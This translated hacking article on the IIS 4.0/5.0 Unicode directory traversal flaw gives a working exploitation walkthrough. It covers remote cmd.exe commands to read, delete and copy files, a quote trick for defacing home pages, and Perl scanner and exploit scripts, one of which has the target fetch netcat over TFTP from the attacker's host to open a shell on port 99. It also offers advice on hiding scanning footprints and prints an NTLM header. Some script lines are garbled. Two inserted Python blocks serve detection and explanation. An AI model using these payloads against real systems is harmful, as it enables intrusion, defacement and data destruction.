One. Existing vulnerabilities
1. Microsoft IIS 4.0/5.0 has an extended UNICODE directory traversal vulnerability, which is both a remote vulnerability and a local vulnerability.
Affected versions:
Microsoft IIS 5.0
+ Microsoft Windows NT 2000
Microsoft IIS 4.0
+ Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.5
- Microsoft Windows NT 4.0
+ Microsoft BackOffice 4.0
- Microsoft Windows NT 4.0
Unaffected version:
Vulnerability description:
Microsoft IIS 4.0 and 5.0 both contain a directory traversal vulnerability in which extended UNICODE characters stand in for "/" and "\" so that "../" can be used.
Unauthorized users can use the security context of the IUSR_machinename account to access any known file. By default this account belongs to the Everyone and Users groups, so any file on the same logical drive that those groups can access can be deleted, modified or executed, just as a user who has successfully logged in could do.
Test method:
/scripts/..%c1%1c../path/
%c0%af = /
%c1%9c =
Solution:
The vulnerability patch is released with Microsoft Security Announcement MS00-057
(/technet/security/bulletin/)
You can download the patch from the following address:
IIS 4.0
/ntserver/nts/downloads/critical/q301625/
IIS 5.0
/windows2000/downloads/critical/q301625/
2. IIS 4.0/5.0 unicode decoding vulnerability causes file leakage or execution
IIS 4.0 and IIS 5.0 have a security vulnerability in the implementation of Unicode character decoding, which causes users to execute arbitrary commands remotely through IIS. When IIS opens a file, if the file name contains unicode characters, it will decode it. If the user provides some special encoding, it will cause IIS to open incorrectly or execute files outside of the web root directory.
For the Chinese version of IIS 5.0/4.0, when IIS receives a URL request whose file name contains a special encoding such as "%c1%hh" or "%c0%hh", it first decodes it into the bytes 0xc1 0xhh and then tries to open that file. Windows takes 0xc1 0xhh to be a possible Unicode (UTF-8) encoding and decodes it first; if 0x00 <= %hh < 0x40, the decoding has the following form:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
Therefore, with this encoding, we can construct many characters, such as:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
Attackers can use this vulnerability to bypass IIS path checking, execute or open any file.
(1) If the system contains an executable directory, any system commands may be executed. The following URL may
List the contents of the current directory:
/scripts/..%c1%1c../winnt/system32/?/c+dir
(2) It is also possible to use this vulnerability to view the content of the system file:
//..%c1%1c../..%c1%1c../winnt/
Rain Forest Puppy <rfp@> found in testing that the same problem exists in the English version of IIS 4.0/5.0, but the encoding is slightly different, becoming "%c0%af" or "%c1%9c".
2. Temporary solution:
1. If executable CGI is not needed, you can delete the executable virtual directory, such as /scripts, etc.
2. If you really need an executable virtual directory, it is recommended that the executable virtual directory be in a separate partition.
Vendor patch:
Microsoft has issued a security bulletin MS00-78, which you can see in more detail at the following address:
/technet/Security/Bulletin/
The patch can be downloaded from the following address:
Microsoft IIS 4.0:
/ntserver/nts/downloads/critical/q301625/
Microsoft IIS 5.0:
/windows2000/downloads/critical/q301625/
Two. The principle of the UNICODE vulnerability
The vulnerabilities above are present starting from Chinese IIS 4.0+SP6, and also affect Chinese WIN2000+IIS 5.0 and Chinese WIN2000+IIS 5.0+SP1. * Traditional Chinese versions have the same vulnerability.
In the Chinese version of WIN2000 there is a bug in the UNICODE decoding, under which
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '\'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '/'
In NT4, / is encoded as %c1%9c.
In the English version of WIN2000: %c0%af.
However, information obtained from certain foreign sites shows that the following encodings can also be used to detect the vulnerability:
%c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af
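As an added example (not code from the original article), the decoding rule from the vulnerability description is carried through in Python for every multi-byte form in the list above, and it also shows the check-before-decode order that let the traversal through against the check-after-decode order that stops it. The function names and the sample request path are this example's own; the probes with non-hex digits (%c1%pc and the like) are not valid percent-escapes and are left alone by it.

```python
import re
from urllib.parse import unquote_to_bytes

# Lead-byte ranges of 2- to 6-byte UTF-8 sequences: (low, high, payload mask,
# continuation bytes).  The 5- and 6-byte forms belonged to the original UTF-8
# definition, which is why %f8... and %fc... probes appear in the list above.
_LEAD_SHAPES = (
    (0xC0, 0xDF, 0x1F, 1),
    (0xE0, 0xEF, 0x0F, 2),
    (0xF0, 0xF7, 0x07, 3),
    (0xF8, 0xFB, 0x03, 4),
    (0xFC, 0xFD, 0x01, 5),
)


def lenient_utf8_decode(data: bytes) -> str:
    """Decode the way the flawed decoder did: overlong sequences are accepted
    and only the low six bits of each continuation byte count, with no check
    that the byte starts with 10xxxxxx.  Hence %c1%1c and %c1%9c both give
    0x5c ('\\'), while %c0%af, %c0%2f, %e0%80%af and %fc%80%80%80%80%af all
    give 0x2f ('/')."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        shape = next((s for s in _LEAD_SHAPES if s[0] <= b <= s[1]), None)
        if b < 0x80 or shape is None or i + shape[3] >= len(data):
            out.append(chr(b))  # plain ASCII, stray byte, or truncated sequence
            i += 1
            continue
        _, _, mask, ncont = shape
        cp = b & mask
        for j in range(1, ncont + 1):
            cp = (cp << 6) | (data[i + j] & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += ncont + 1
    return "".join(out)


def decode_escape(token: str) -> int:
    """Code point produced by one percent-encoded sequence such as '%c1%1c'."""
    return ord(lenient_utf8_decode(unquote_to_bytes(token)))


def strict_utf8_rejects(raw_path: str) -> bool:
    """A correct decoder (Python's UTF-8 codec) refuses overlong forms outright."""
    try:
        unquote_to_bytes(raw_path).decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


def _stays_inside(path: str) -> bool:
    """Walk the path components; a '..' that climbs above the start fails."""
    depth = 0
    for comp in re.split(r"[/\\]", path):
        if comp == "..":
            depth -= 1
            if depth < 0:
                return False
        elif comp not in ("", "."):
            depth += 1
    return True


def allowed_check_before_decode(raw_path: str) -> bool:
    """The flawed order: percent-decode, judge '..', and let the file system
    interpret the bytes as UTF-8 later.  Bytes c1 1c are still stuck inside the
    single component '..\\xc1\\x1c..', so no traversal is seen."""
    return _stays_inside(unquote_to_bytes(raw_path).decode("latin-1"))


def allowed_check_after_decode(raw_path: str) -> bool:
    """The fixed order: canonicalise exactly as the file system will, then check."""
    return _stays_inside(lenient_utf8_decode(unquote_to_bytes(raw_path)))


if __name__ == "__main__":
    for tok in ("%c1%1c", "%c1%9c", "%c0%af", "%c0%2f", "%e0%80%af",
                "%f0%80%80%af", "%fc%80%80%80%80%af"):
        print(f"{tok:<22} -> 0x{decode_escape(tok):02x} {chr(decode_escape(tok))!r}")
    probe = "/scripts/..%c1%1c../winnt/system32/"  # request shape from the text
    print("check before decode allows:", allowed_check_before_decode(probe))
    print("check after decode allows: ", allowed_check_after_decode(probe))
    print("strict decoder rejects:    ", strict_utf8_rejects(probe))
```

The two checks differ only in where the UTF-8 step sits: the first judges the path while the bytes 0xc1 0x1c still form part of one component, the second judges the same path the file system will actually open. The strict decoder is the simplest fix of all, since a compliant UTF-8 implementation rejects every overlong form on the list.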
Three. Detection of the UNICODE vulnerability
The following all take the Chinese version of WIN2K as an example. For another NT version, replace the simplest detection string, %c1%1c, in the code below with the encoding described above.
For example, suppose there is a WIN2K host with a certain IP address. We enter /scripts/..%c1%1c../winnt/system32/?/c+dir in the address bar. If the vulnerability exists, we see the following (assuming, for example, that the SCRIPTS directory is empty):
Directory of C:\inetpub\scripts
2000-09-28 15:49 <DIR> .
2000-09-28 15:49 <DIR> ..
In fact, it can also be changed to 127.0.0.1/scripts/..%c1%1c../winnt/system32/?/r+dir, that is, the letter r substituted for c. The letter r is equivalent to c; cmd /? gives the explanation.
Of course, if the administrator of the target host has deleted that directory, we will not be able to see it, but the following directories can also be used for testing.
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/?/c+dir
After running, we can see
Directory of c:\program files\common files\system\msadc
2000-08-06 19:16 <DIR> .
2000-08-06 19:16 <DIR> ..
(The following content is omitted)
19 File(s) 1,233,840 bytes
2 Dir(s) 6,290,644,992 bytes free
If the vulnerability and the directory both exist, everything in the corresponding directory is shown on the WEB page. This is only vulnerability detection for a single target host. To detect the UNICODE vulnerability on NT hosts across an IP segment, we need scanning software like the following. The source code below was written by a foreign hacker; it only scans the English version of NT, and to scan the Chinese version corresponding modifications are required.
#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing homework in my room.
#it will go through a list of sites and check if it gives a directory listing for the new IIS hole
#it checks for both %c0%af and %c1%9c
#perhaps a public script to do some evil stuff with this exploit later... h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=<STDIN>);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while (<IN>)
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>");   # output file name is missing from the page; give one after ">>"
print OUT "\n$host[$a] : ", $response->content;   # method call outside the string
close OUT;
} else {
print $response->error_as_HTML;
}
&second();
}
sub second() {
my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>");   # output file name is missing from the page; give one after ">>"
print OUT "\n$host[$a] : ", $response->content;   # method call outside the string
close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}
You can run the above .pl program on your own machine (of course PERL must be installed), or run it remotely on a server.
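The scanners on this page probe a host from the outside. As an added example from the defender's side (not code from the original article or from the tools it describes), the following Python reads IIS W3C extended log lines and flags the request shapes shown above: a ".." pair with percent-encoded bytes between the dots, a "/c+" shell-style query, and one client cycling through several encodings the way the multi-method scanner does. The log lines are constructed for this example, the field layout assumes the URI stem is logged as received, and every function name is this example's own.

```python
import re
from collections import defaultdict

# Constructed sample of an IIS W3C extended log for this example (not taken from
# the page).  Field order is the usual W3C layout and the URI stem is assumed
# to be logged as received, before any decoding.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2000-10-18 10:01:02 192.0.2.10 GET /default.htm - 200
2000-10-18 10:01:09 198.51.100.7 GET /scripts/..%c0%af../winnt/system32/ /c+dir 200
2000-10-18 10:01:10 198.51.100.7 GET /scripts/..%c1%9c../winnt/system32/ /c+dir 404
2000-10-18 10:01:11 198.51.100.7 GET /scripts/..%e0%80%af../winnt/system32/ /c+dir 404
2000-10-18 10:01:12 198.51.100.7 GET /msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/ /c+dir 500
2000-10-18 10:02:30 192.0.2.10 GET /scripts/app/../index.asp - 200
2000-10-18 10:03:00 203.0.113.5 GET /scripts/..%c1%1c../winnt/system32/ /c+dir 200
"""

# '..' + one or more percent-encoded bytes + '..': a separator that only comes
# into existence after the server's own decoding step.  A legitimate '../'
# inside the tree (line 6 above) does not match.
ENCODED_TRAVERSAL = re.compile(r"\.\.((?:%[0-9a-fA-F]{2})+)\.\.")
# Query of the form '/c+<command>': the shell-style argument the text shows.
SHELL_QUERY = re.compile(r"^/[cCkK](?:\+|%20| )")


def parse_w3c(text):
    """Minimal W3C extended log parser driven by the #Fields: directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows


def scan_log(text):
    """One finding per request whose URI stem carries an encoded traversal."""
    findings = []
    for row in parse_w3c(text):
        m = ENCODED_TRAVERSAL.search(row["cs-uri-stem"])
        if not m:
            continue
        findings.append({
            "time": row["date"] + " " + row["time"],
            "ip": row["c-ip"],
            "encoding": m.group(1).lower(),
            "shell_query": bool(SHELL_QUERY.match(row["cs-uri-query"])),
            "status": int(row["sc-status"]),
        })
    return findings


def summarize(findings, probe_threshold=3):
    """Per client: distinct encodings tried, hits, and 200 responses to a shell
    query (what the text shows when the hole is present).  A client cycling
    through several encodings is flagged as a multi-encoding probe, which is
    how the scanners reproduced on this page behave."""
    per_ip = defaultdict(lambda: {"encodings": set(), "hits": 0, "successes": 0})
    for f in findings:
        s = per_ip[f["ip"]]
        s["encodings"].add(f["encoding"])
        s["hits"] += 1
        if f["status"] == 200 and f["shell_query"]:
            s["successes"] += 1
    for s in per_ip.values():
        s["probe"] = len(s["encodings"]) >= probe_threshold
    return dict(per_ip)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['time']} {f['ip']:<14} {f['encoding']:<12} status={f['status']}"
              f"{'  shell query' if f['shell_query'] else ''}")
    for ip, s in summarize(found).items():
        print(f"{ip}: {s['hits']} hits, {len(s['encodings'])} encodings,"
              f" {s['successes']} likely successful, probe={s['probe']}")
```

A 200 on a traversal request with a shell-style query is the line worth acting on first, since that is exactly the response the text describes for a vulnerable host; 404 and 500 on the same shapes still record that the host was probed and with which encodings.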
Four. Commands for simple exploitation of UNICODE encoding vulnerabilities
Generally, the directory we see with /scripts/..%c1%1c../winnt/system32/?/c+dir is empty, for example:
Directory of C:\inetpub\scripts
2000-09-28 15:49 <DIR> .
2000-09-28 15:49 <DIR> ..
If we instead enter /scripts/..%c1%1c../winnt/system32/?/c+dir+c:\ we can see the directories and files on the host's C: drive.
Some other simple usages:
1. Display file contents
To display one of the text files inside, enter it like this (htm, html, asp, bat and other files work the same way): /scripts/..%c1%1c../winnt/system32/?/c+type+c:\
The contents of the file are then displayed in IE.
2. Command to create a folder
After /scripts/..%c1%1c../winnt/system32/?/c+md+c:\badboy runs, we see a result like this:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
In plain words this means a CGI error: the specified CGI application misbehaved and could not return a complete set of HTTP headers; the headers it did return follow.
3. Delete empty folder command
/scripts/..%c1%1c../winnt/system32/?/c+rd+c:\badboy
Return information as above
4. The command to delete a file
/scripts/..%c1%1c../winnt/system32/?/c+del+c:\
Return information as above
5. Command to copy a file under a new name
/scripts/..%c1%1c../winnt/system32/?/c+copy+c:\
Return information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
1 file(s) copied.
6. Display the current environment variables of the target host
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+set
Returned information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
ALLUSERSPROFILE=E:\Documents and Settings\All Users
AUTH_TYPE=Negotiate
AUTH_USER=BADBOYCL-DQQZQQ\badboy
CASL_BASEDIR_ENV=E:\scan\CyberCop Scanner\casl
CommonProgramFiles=E:\Program Files\Common Files
COMPUTERNAME=BADBOYCL-DQQZQQ
ComSpec=E:\WINNT\system32\
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=127.0.0.1
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
HTTP_AUTHORIZATION=Negotiate TlRMTVNTUAADAAAAGAAYAIgAAAAYABgAoAAAAB4AHgBAAAAADA
AMAF4AAAAeAB4AagAAAAAAAAC4AAAABYKAgEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAGIAY
QBkAGIAbwB5AEIAQQBEAEIATwBZAEMATAAtAEQAUQBRAFoAUQBRAODLOAUsBqOAQ3/+AfwqHKj8Q2vz
SAGGgkD6hCEY0EoOIKZVHMr4lmc1Ju37n7SleT==
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_I
7. COPY all files in a certain folder to another folder at one time
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+xcopy c:\badboy c:\inetpub\wwwroot
Returned information:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
If we check the c:\inetpub\wwwroot folder, everything in c:\badboy has been copied into it.
8. Move a folder into the specified directory
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+move c:\badboy c:\inetpub\wwwroot Haha, this works too. How long it takes depends on the number of files.
9. Display the contents of all files of one type under a certain path
http://127.0.0.1/scripts/..%c1%1c..\winnt/system32/?/n+/v+""+c:\inetpub\wwwroot\*.ht*
Everything is displayed! Similarly, many other commands can be executed; you can try them, but some take a long time and some will not execute. About the + sign: here + stands for the space bar. Of course, you can also type a space; after running it is converted to %20, and %c1%1c = /, which is the same principle. For folder names longer than 8 characters, viewing the contents is a little different. For example, to see the contents of the target host's Program Files folder, we should enter:
http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir+c:\progra~1
Here you cannot use + or %20 in place of the space between Program and Files.
To see the folder aa bb, use http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir%20e:\aabb~1
aa bb = aabb~1
If there is also an aab b folder in the same directory, use http://127.0.0.1/scripts/..%c1%1c../winnt/system32/?/c+dir%20e:\aabb~2 to view its contents.
And so on.
Five. How to simply modify the target host's web page
Generally speaking, we need to modify the target host's web files. The commonly used method is the echo command together with the redirection operators.
The functions of these commands and operators are as follows:
D:\>echo /?
Displays messages, or turns command echoing on or off.
ECHO [ON | OFF]
ECHO [message]
Type ECHO without parameters to display the current echo setting.
Redirection operators > and >>
"> >>" redirect the output produced by a command, for example writing it to a file or sending it to a printer.
>> appends the output to the file; > overwrites the file's existing contents.
Let us look at part of the output of cmd /?:
Note that if the string has quotes, multiple commands separated by the command separator '&&' are accepted. Also, for compatibility reasons, /X is the same as /E:ON, /Y is the same as /E:OFF, and /R is the same as /C. Any other command options are ignored.
If /C or /K is specified, the rest of the command line after the option is processed as the command line; in this case the following logic is used to process quote characters ("):
1. Quote characters on the command line are preserved if all of the following conditions are met:
- no /S option
- exactly two quote characters
- no special characters between the two quote characters, where the special characters are: <>()@^|
- at least one whitespace character between the two quote characters
- at least one executable name between the two quote characters
2. Otherwise, the old behavior is to see whether the first character is a quote character; if so, strip the leading character and remove the last quote character on the command line, keeping the text after the last quote character.
What can we learn from the above?
We know that when the IIS loader detects one of the special characters "&|(,;%<>" it returns a 500 error, so the redirection character cannot be used directly.
Through
/scripts/..%c1%1c../winnt/system32/?/c+echo+badboy+> c:\
we see the prompt HTTP 500 - Internal Server Error in Internet Explorer.
After repeated tests, and prompted by the cmd help text above, we find that the " quotation mark character can be used. Yuange (Yuan Ge) of Zhonglian Green League has issued an advisory about this character; I think it may also have come from the cmd /? information above (this is purely a personal guess; if not, please do not be surprised).
We want to use echo and > together, so we can do this:
/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+badboy+> c:\
Note that the difference from the original command is the " character after cmd. After running, we see the returned result:
CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:
In plain words this means a CGI error: the specified CGI application misbehaved and could not return a complete set of HTTP headers; the headers it did return follow.
In fact, badboy has been written into the file under c:\.
Using this method we can create files such as .bat, .txt, .asp, .htm and .html. This can be called the beginning of a fatal blow to a website with this vulnerability, especially when writing .bat files: if we add format, del and other commands into one, what do you think will happen?
Back to the question of modifying the website page.
For example, to modify c:\inetpub\wwwroot\
we can enter this in the address bar:
/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+your+site+has+unicode+bug+> c:\inetpub\wwwroot\
Then, when the home page is viewed, it has been changed to
your site has unicode bug
It is that simple. Any ordinary person can carry out the simplest HACK against a target host with this vulnerability through the address bar.
Of course, to make input easier, we can copy the file under another name, for example
/scripts/..%c1%1c../winnt/system32/?/c+copy+c:\winnt\system32\+c:\inetpub\scripts\
and afterwards use directly
/scripts/?/c+echo+badboy+> c:\
Six. Analysis of some UNICODE scanning programs available on the network
1. Simple and easy to use
Operating platform: win9x, NT4, WIN2K
The software can be found in some Chinese hacker software collections. It is a command-line tool written in C++ by Redp0wer, a HACK technology enthusiast in mainland China, for scanning an IP segment for the UNICODE encoding vulnerability. The tool scans quickly and accurately. Scanning can be performed on local and remote compromised NT hosts ("meat machines") and produces a simple scan report (only the IP addresses of the NT hosts in the scanned IP segment are recorded). This software tests the scripts, IISADMPWD, msadc, cgi-bin and _vti_bin directories of the target NT host for the UNICODE encoding vulnerability.
If you can only scan an IP segment from your own machine and you have a fixed IP address, note that your scanning actually exposes you to the other side, and it is easy for them to catch you and sue you for intrusion. The execution footprint can be found in the Event Viewer:
Application log c:\WINNT\system32\config\
Security log C:\WINNT\System32\config\
System log C:\WINNT\system32\config\
When we analyze the source code of this software, we see the request string GET /%s/%s/winnt/system32/?/c%scopy%s%s:\\\winnt\\... (the rest of the string is garbled in the source). So, if you do not know how to erase your footprints and are using a compromised host to scan, it is best not to use this software as your scanning tool.
2. A more comprehensive UNICODE tool
As long as PERL is supported, this tool can be used to scan a target host for the UNICODE encoding vulnerability. It can scan and test all NT versions for the vulnerability. The source of the program follows; I will not explain in detail how to operate it.
#!/usr/bin/perl
#
# checks a host for the recent IIS unicode vulnerability
# in 14 different ways. Also gives you the browser URL for the
# exploit. Origionally Stealthmode316, modifications by Roeland
#
#
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK
Example: ./ :80\n";}
#($host,$port)=split(/:/,$ARGV[0]);
$host = $ARGV[0];   # first argument is the host; scalar element, not an array slice
$port = 80;
$target = inet_aton($host);
$flag=0;
# ---------------test method 1
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 2
my @results=sendraw("GET /scripts..%c1%9c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts..%c1%9c../winnt/system32/?/c+dir\n";}}
# ---------------test method 3
my @results=sendraw("GET /scripts/..%c1%pc../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%pc../winnt/system32/?/c+dir\n";}}
# ---------------test method 4
my @results=sendraw("GET /scripts/..%c0%9v../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%9v../winnt/system32/?/c+dir\n";}}
# ---------------test method 5
my @results=sendraw("GET /scripts/..%c0%qf../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c0%qf../winnt/system32/?/c+dir\n";}}
# ---------------test method 6
my @results=sendraw("GET /scripts/..%c1%8s../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%8s../winnt/system32/?/c+dir\n";}}
# ---------------test method 7
my @results=sendraw("GET /scripts/..%c1%1c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%1c../winnt/system32/?/c+dir\n";}}
# ---------------test method 8
my @results=sendraw("GET /scripts/..%c1%9c../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%9c../winnt/system32/?/c+dir\n";}}
# ---------------test method 9
my @results=sendraw("GET /scripts/..%c1%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%c1%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 10
my @results=sendraw("GET /scripts/..%e0%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%e0%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 11
my @results=sendraw("GET /scripts/..%f0%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f0%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 12
my @results=sendraw("GET /scripts/..%f8%80%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%f8%80%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 13
my @results=sendraw("GET /scripts/..%fc%80%80%80%80%af../winnt/system32/?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/scripts/..%fc%80%80%80%80%af../winnt/system32/?/c+dir\n";}}
# ---------------test method 14
my @results=sendraw("GET /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/\?/c\+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;print "$host/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/\?/c\+dir\n";}}
if ($flag!=1) {
print "$host: Not vulnerable\n";
exit;
}
sub sendraw {
$hbn = gethostbyname($host);
if ($hbn) {
my ($pstr)=@_;
# getprotobyname, not gethostbyname: the fourth argument is the protocol number
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
# sockaddr_in builds the address portably instead of the hand-packed "SnA4x8"
if(connect(S,sockaddr_in($port,$target))) {
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){
push @in, $_;
}
select(STDOUT);
close(S);
return @in;
} else {
print "$host: Can't connect\n";
exit;
}
} else {
print "$host: Host not found\n";
exit;
}
}
3. The NIT_UNICODE attack software set
Download address: /0011-exploits/NIT_UNICODE.zip
The compressed package contains the following files:
-----PERL program that drives the TFTP process
-----A netcat * that sets up a telnet port on 99
-----TFTP setup software
-----Help file
flie_id.diz
----Instructions and examples
This package mainly uses the unicode encoding vulnerability to upload it to the target host and start it, allowing the attacker to log in to the target host through its telnet port 99 for further attack.
When using the following program, some things need to be modified. Find the line $command="tftp -i . GET c:\\\inetpub\\scripts\"; and change it to your own IP address, then save. This line transfers the file from your host to c:\inetpub\scripts\ on the target host. In addition, the ..%c0%af.. in the program must be modified according to the NT version of the target host; for example, if the target host is WIN2K, change it to ..%c1%1c..
#!/usr/bin/perl
# This is for educational purpose's only!
# WHO LET THEM DOGS OUT!
# Use first to see if this is a vulnerable server!
# Based of the script from Roelof Temmngh
# Files=,,,,
use Socket;
if ($#ARGV<0) {die "Usage: IP:port command\n";}
($host,$port)=split(/:/,$ARGV[0]);   # scalar element, not an array slice
$target = inet_aton($host);
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n\cls");
foreach $line (@results){
if ($line =~ //) {$failed=0;}   # the pattern between the slashes is missing from the page
}
$failed2=1;
if ($failed==1) {
#You need to change the . to your ip address. Duh!
$command="tftp -i . GET c:\\inetpub\\scripts\\";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ // )) {$failed2=0;}   # the pattern between the slashes is missing from the page
}
}
$command=$ARGV[1];   # scalar element, not an array slice
print "\n\nHit CTRL-C if this is Hanging";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../winnt/system32/?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP rfp@
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||2) ||
die("Socket problems\n");
if(connect(S,sockaddr_in($port,$target))){   # portable sockaddr instead of the hand-packed "SnA4x8"
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# NIT IN THE YEAR 2000
Seven. Improving exploitation of the unicode encoding vulnerability
This does not mean that the following methods will succeed completely wherever a UNICODE encoding vulnerability exists. They mainly give you a way of thinking: learn and apply it actively, extend one example to other cases, reproduce more and better exploitation methods, and increase the chance of a successful attack on the target host, which is what makes the harm of the UNICODE encoding vulnerability so serious.
Understand the content of the CMD help, especially this part:
Note that if the string has quotes, multiple commands separated by the command separator '&&' are accepted. Also, for compatibility reasons, /X is the same as /E:ON, /Y is the same as /E:OFF, and /R is the same as /C. Any other command options are ignored.
If /C or /K is specified, the rest of the command line after the option is used as the command line; in this case the following logic is used to process quote characters ("):
1. If all of the following conditions are met, the quote characters on the command line are preserved:
- no /S option
- exactly two quote characters
- no special characters between the two quote characters, where the special characters are: <>()@^|
- at least one whitespace character between the two quote characters
- at least one executable name between the two quote characters
2. Otherwise, the old behavior is to see whether the first character is a quote character; if so, strip the leading character and remove the last quote character on the command line, keeping the text after the last quote character.
Be familiar with the conversion format for writing special characters into text files with ECHO:
< = %3C   > = %3E   / = %2F   \ = %5C   = = %3D   + = %2B   ( = %28
